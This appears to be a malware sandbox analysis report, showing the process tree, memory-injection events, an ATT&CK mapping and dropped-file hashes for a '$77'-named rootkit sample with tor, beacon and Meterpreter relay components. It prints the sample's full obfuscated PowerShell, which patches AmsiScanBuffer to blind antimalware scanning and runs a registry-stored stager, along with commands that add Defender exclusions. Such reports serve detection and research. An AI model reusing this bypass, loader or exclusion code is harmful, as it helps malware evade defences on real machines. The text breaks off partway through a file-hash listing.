Token: SeCreatePagefilePrivilege	3380	mousocoreworker.exe
Token: SeShutdownPrivilege	3980	RuntimeBroker.exe

Suspicious use of UnmapMainImage 4 IoCs

pid	Process
2712	svchost.exe
2712	svchost.exe
2712	svchost.exe
3524	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3996 wrote to memory of 4324	3996	8e3c8a67122bed24ce4a67ce7df0af3bf3b856dad467edd059c5afdbf46a6cf2.exe	94
PID 3996 wrote to memory of 4324	3996	8e3c8a67122bed24ce4a67ce7df0af3bf3b856dad467edd059c5afdbf46a6cf2.exe	94
PID 3996 wrote to memory of 4324	3996	8e3c8a67122bed24ce4a67ce7df0af3bf3b856dad467edd059c5afdbf46a6cf2.exe	94
PID 3996 wrote to memory of 4464	3996	8e3c8a67122bed24ce4a67ce7df0af3bf3b856dad467edd059c5afdbf46a6cf2.exe	97
PID 3996 wrote to memory of 4464	3996	8e3c8a67122bed24ce4a67ce7df0af3bf3b856dad467edd059c5afdbf46a6cf2.exe	97
PID 3996 wrote to memory of 4464	3996	8e3c8a67122bed24ce4a67ce7df0af3bf3b856dad467edd059c5afdbf46a6cf2.exe	97
PID 3996 wrote to memory of 4124	3996	8e3c8a67122bed24ce4a67ce7df0af3bf3b856dad467edd059c5afdbf46a6cf2.exe	104
PID 3996 wrote to memory of 4124	3996	8e3c8a67122bed24ce4a67ce7df0af3bf3b856dad467edd059c5afdbf46a6cf2.exe	104
PID 3996 wrote to memory of 4124	3996	8e3c8a67122bed24ce4a67ce7df0af3bf3b856dad467edd059c5afdbf46a6cf2.exe	104
PID 4124 wrote to memory of 2488	4124	$77master.exe	106
PID 4124 wrote to memory of 2488	4124	$77master.exe	106
PID 4124 wrote to memory of 2488	4124	$77master.exe	106
PID 4124 wrote to memory of 4988	4124	$77master.exe	108
PID 4124 wrote to memory of 4988	4124	$77master.exe	108
PID 4124 wrote to memory of 4988	4124	$77master.exe	108
PID 4488 wrote to memory of 952	4488	powershell.EXE	111
PID 4488 wrote to memory of 952	4488	powershell.EXE	111
PID 4488 wrote to memory of 952	4488	powershell.EXE	111
PID 4488 wrote to memory of 952	4488	powershell.EXE	111
PID 4488 wrote to memory of 952	4488	powershell.EXE	111
PID 4488 wrote to memory of 952	4488	powershell.EXE	111
PID 4488 wrote to memory of 952	4488	powershell.EXE	111
PID 4488 wrote to memory of 952	4488	powershell.EXE	111
PID 952 wrote to memory of 616	952	dllhost.exe	5
PID 952 wrote to memory of 676	952	dllhost.exe	7
PID 952 wrote to memory of 956	952	dllhost.exe	12
PID 952 wrote to memory of 1016	952	dllhost.exe	13
PID 952 wrote to memory of 392	952	dllhost.exe	14
PID 952 wrote to memory of 436	952	dllhost.exe	16
PID 952 wrote to memory of 1128	952	dllhost.exe	17
PID 952 wrote to memory of 1136	952	dllhost.exe	18
PID 952 wrote to memory of 1144	952	dllhost.exe	19
PID 952 wrote to memory of 1152	952	dllhost.exe	20
PID 952 wrote to memory of 1272	952	dllhost.exe	21
PID 952 wrote to memory of 1304	952	dllhost.exe	22
PID 952 wrote to memory of 1332	952	dllhost.exe	23
PID 952 wrote to memory of 1412	952	dllhost.exe	24
PID 952 wrote to memory of 1448	952	dllhost.exe	25
PID 952 wrote to memory of 1576	952	dllhost.exe	26
PID 952 wrote to memory of 1584	952	dllhost.exe	27
PID 952 wrote to memory of 1604	952	dllhost.exe	28
PID 952 wrote to memory of 1716	952	dllhost.exe	29
PID 952 wrote to memory of 1752	952	dllhost.exe	30
PID 952 wrote to memory of 1760	952	dllhost.exe	31
PID 952 wrote to memory of 1852	952	dllhost.exe	32
PID 952 wrote to memory of 1972	952	dllhost.exe	33
PID 952 wrote to memory of 1980	952	dllhost.exe	34
PID 952 wrote to memory of 2040	952	dllhost.exe	35
PID 952 wrote to memory of 1064	952	dllhost.exe	36
PID 952 wrote to memory of 1232	952	dllhost.exe	37
PID 952 wrote to memory of 2100	952	dllhost.exe	38
PID 952 wrote to memory of 2204	952	dllhost.exe	40
PID 952 wrote to memory of 2288	952	dllhost.exe	41
PID 952 wrote to memory of 2500	952	dllhost.exe	42
PID 952 wrote to memory of 2512	952	dllhost.exe	43
PID 952 wrote to memory of 2632	952	dllhost.exe	44
PID 952 wrote to memory of 2644	952	dllhost.exe	45
PID 952 wrote to memory of 2712	952	dllhost.exe	46
PID 952 wrote to memory of 2736	952	dllhost.exe	47
PID 952 wrote to memory of 2800	952	dllhost.exe	48
PID 952 wrote to memory of 2820	952	dllhost.exe	49
PID 952 wrote to memory of 2840	952	dllhost.exe	50
PID 952 wrote to memory of 2860	952	dllhost.exe	51
PID 952 wrote to memory of 3040	952	dllhost.exe	52

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:616
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1016
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{8b5552a7-f693-49ba-8731-481f766e73aa}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:952

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:392

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:436

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1128
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2736
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:AXKSbzOTopUM{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$NvdxyPIYWAuuRR,[Parameter(Position=1)][Type]$ubREhcvmjr)$HPzDPEHbfGN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+[Char](77)+''+'e'+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+'M'+[Char](111)+''+'d'+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType('My'+'D'+'e'+'l'+''+'e'+''+[Char](103)+''+[Char](97)+''+'t'+''+'e'+''+[Char](84)+'y'+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+'e'+[Char](97)+''+[Char](108)+'e'+[Char](100)+''+[Char](44)+'A'+'n'+'siC'+[Char](108)+''+'a'+''+'s'+''+[Char](115)+''+','+''+'A'+''+[Char](117)+'to'+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+'s'+'',[MulticastDelegate]);$HPzDPEHbfGN.DefineConstructor('RT'+'S'+'p'+'e'+''+[Char](99)+''+[Char](105)+'alN'+'a'+''+[Char](109)+'e'+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+'i'+[Char](103)+''+[Char](44)+'P'+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$NvdxyPIYWAuuRR).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+'t'+'i'+''+'m'+''+[Char](101)+','+[Char](77)+''+'a'+''+[Char](110)+'a'+[Char](103)+''+'e'+''+[Char](100)+'');$HPzDPEHbfGN.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+'o'+[Char](107)+''+[Char](101)+'',''+[Char](80)+'u'+'b'+''+'l'+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+'N'+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+''+'o'+'t,'+[Char](86)+''+'i'+''+'r'+''+'t'+''+[Char](117)+'a'+[Char](108)+'',$ubREhcvmjr,$NvdxyPIYWAuuRR).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+','+[Char](77)+''+'a'+'n'+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $HPzDPEHbfGN.CreateType();}$OSXlNFNXUCRCb=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+'t'+'e'+[Char](109)+''+[Char](46)+'dl'+'l'+'')}).GetType(''+'M'+'i'+[Char](99)+'r'+[Char](111)+''+'s'+'o'+[Char](102)+''+[Char](116)+''+'.'+''+'W'+'i'+[Char](110)+''+'3'+'2.'+[Char](85)+''+[Char](110)+''+[Char](115)+''+'a'+''+[Char](102)+'e'+[Char](78)+'a'+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+'M'+[Char](101)+''+'t'+'h'+[Char](111)+''+[Char](100)+''+'s'+'');$UjiMfwAgjXZHGx=$OSXlNFNXUCRCb.GetMethod('Ge'+[Char](116)+''+[Char](80)+''+'r'+''+[Char](111)+''+[Char](99)+'A'+'d'+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+','+[Char](83)+''+'t'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$AEKksnChDEHsYZYhosb=AXKSbzOTopUM @([String])([IntPtr]);$OaViASTXQEnSBKMmiklguY=AXKSbzOTopUM @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$uFELJzTHvSe=$OSXlNFNXUCRCb.GetMethod('Ge'+[Char](116)+''+'M'+''+[Char](111)+''+'d'+''+'u'+''+'l'+''+'e'+''+[Char](72)+''+[Char](97)+''+[Char](110)+'d'+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+'2'+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'')));$RMEfOxhfSFojFr=$UjiMfwAgjXZHGx.Invoke($Null,@([Object]$uFELJzTHvSe,[Object](''+'L'+'oa'+[Char](100)+''+[Char](76)+''+[Char](105)+'b'+'r'+''+'a'+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$qDXuNMVTSFNGQjgZD=$UjiMfwAgjXZHGx.Invoke($Null,@([Object]$uFELJzTHvSe,[Object](''+[Char](86)+'ir'+'t'+''+[Char](117)+''+[Char](97)+'l'+[Char](80)+''+[Char](114)+'o'+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$rBpYBwd=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RMEfOxhfSFojFr,$AEKksnChDEHsYZYhosb).Invoke(''+[Char](97)+'msi'+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$qbIWGgzWmgTZaUwjM=$UjiMfwAgjXZHGx.Invoke($Null,@([Object]$rBpYBwd,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+'Sc'+'a'+'n'+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$ARoJiuegrE=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qDXuNMVTSFNGQjgZD,$OaViASTXQEnSBKMmiklguY).Invoke($qbIWGgzWmgTZaUwjM,[uint32]8,4,[ref]$ARoJiuegrE);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$qbIWGgzWmgTZaUwjM,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qDXuNMVTSFNGQjgZD,$OaViASTXQEnSBKMmiklguY).Invoke($qbIWGgzWmgTZaUwjM,[uint32]8,0x20,[ref]$ARoJiuegrE);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'TW'+'A'+'R'+[Char](69)+'').GetValue('$'+'7'+''+[Char](55)+''+'s'+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4488

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1136

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1144

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1152

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1272

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1304

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1332

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1412

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1448
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2632

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1576

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1584

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1604

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1716

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1752

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1760

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1852

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1972

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1980

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2040

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1064

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1232

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2100

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2204

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2288

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2500

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2512

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2644

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Suspicious use of UnmapMainImage
PID:2712

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2800

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2820

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2840

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2860

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3040

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2112

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3384

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of UnmapMainImage
PID:3524
- C:\Users\Admin\AppData\Local\Temp\8e3c8a67122bed24ce4a67ce7df0af3bf3b856dad467edd059c5afdbf46a6cf2.exe
  "C:\Users\Admin\AppData\Local\Temp\8e3c8a67122bed24ce4a67ce7df0af3bf3b856dad467edd059c5afdbf46a6cf2.exe"
  2⤵
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3996
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4716
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\\Windows\\$77driver'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4324
- - C:\Windows\$77driver\$77tor.exe
    C:\Windows\$77driver\$77tor.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4464
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1512
- - C:\Windows\$77driver\$77master.exe
    C:\Windows\$77driver\$77master.exe
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4124
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1640
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:/windows/$77driver'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2488
  - - C:\windows\$77driver\$77install.exe
      C:/windows/$77driver\$77install.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4988
  - - C:\windows\$77driver\$77securerelay.exe
      C:/windows/$77driver\$77securerelay.exe
      4⤵
      Executes dropped EXE
      PID:2488
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3436
  - - C:\windows\$77driver\$77beacon.exe
      C:/windows/$77driver\$77beacon.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1596
  - - C:\windows\$77driver\$77securerelayMeterpreter.exe
      C:/windows/$77driver\$77securerelayMeterpreter.exe
      4⤵
      Executes dropped EXE
      PID:2528
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:432
  - - C:\windows\$77driver\$77securerelayMeterpreter.exe
      C:/windows/$77driver\$77securerelayMeterpreter.exe
      4⤵
      Executes dropped EXE
      PID:2468
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5108
  - - C:\windows\$77driver\$77securerelayMeterpreter.exe
      C:/windows/$77driver\$77securerelayMeterpreter.exe
      4⤵
      PID:4136
  - - C:\windows\$77driver\$77securerelayMeterpreter.exe
      C:/windows/$77driver\$77securerelayMeterpreter.exe
      4⤵
      PID:1820
  - - C:\windows\$77driver\$77securerelayMeterpreter.exe
      C:/windows/$77driver\$77securerelayMeterpreter.exe
      4⤵
      PID:4788

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3628

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3824

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3980

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3776

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:4768

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4828

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:3796

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:2396

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1472

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3584

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4172

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4568

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:380

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:516

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:2412

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:4036

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:2404

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:2668

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:3096

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:3380

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:4844

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:632

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:2240

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
1⤵
PID:776

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
3d086a433708053f9bf9523e1d87a4e8

SHA1
b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

SHA256
6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

SHA512
931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
251c7c5083a04cfec80ed16a80c10596

SHA1
1610bbfd2d0cd261e0d21c883775639a434a8dc9

SHA256
3a9d1ae244edf2fd272b4acd07bb08aff108814aa26b10c52bf2df5777470490

SHA512
91d50a166b7cb0cd610a1ed40a87e8e7b3656390b8cb71ed20888547249a96bd097d43f21b9f69d2e8ec79898c34f3192a91a1e6c6393ba38569d1c715e3c565

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

Filesize
330B

MD5
3eaaf7fb3b19168a04f1a357a8bf51fc

SHA1
9a445e08efaad193dfdf6d0e3addb0159a6dc7ae

SHA256
487c267cb07391f9fb29a308114568429178049c9063b3955ac5ab32c9425e33

SHA512
20e0a7bc7938fac9d7241124b430dc6d408212e728147cb0a27432b80ee19f9019ff79f3df62d6aec5d9a1936c0b32cfbf398ac4397aa93c8a8526eb14fc86e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g01lq1ka.osf.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\tor\cached-microdesc-consensus.tmp

Filesize
2.7MB

MD5
128b3f35046419d0ae3f0d52e74f7a14

SHA1
77003882be69536cb933f45b40c6ece394904d54

SHA256
c9ab41d0e07b5f72bd96138c6e5d9dbf782969304d68099c110cc54e663cb9c6

SHA512
a3d61dc84763396ba02628a35c166259bd379832feb0e205b07198d887cc070684e8d9590f4d8e81e31d0fe6e8caa5de28d2001bc84f17355a49a039255fdecc

Download Submit
C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new

Filesize
6.3MB

MD5
2f705d33005eed76bfc2371ae0dba25b

SHA1
a540db2f3268ab089d7efd707e1a4b4b110c5dff

SHA256
1294eefd0dcd3042f59cd7ff661ba5efa5408c787af1c5838190b816c9872902

SHA512
f08f338196c1a9f5e42ff9bf79a31ecaee5b77dda91f77e0e809f877a8b569fd28c55f3e7d31aa2720f2a8117a37602780d5eba40ea8e0eec92bc6ee2630c2a6

Download Submit
C:\Windows\$77driver\$77beacon.exe

Filesize
14.4MB

MD5
57db465cb990a7953cff58ae3aea0370

SHA1
ab1cf86db1997797f02b0a1f7cd201d3f52fe2c5

SHA256
bed174f1786f2c56316d8278044e7765c3b599620c7afbb01714ced9e4da0513

SHA512
1a016e72ae112eb8cbec6f758143b5068885c321e50b71c8a7ce863a22b129a5eabc7884179288a2eedf9ae3f0bad5f8ac634ac597ac290bd16af31b79f6eea3

Download Submit
C:\Windows\$77driver\$77install.exe

Filesize
163KB

MD5
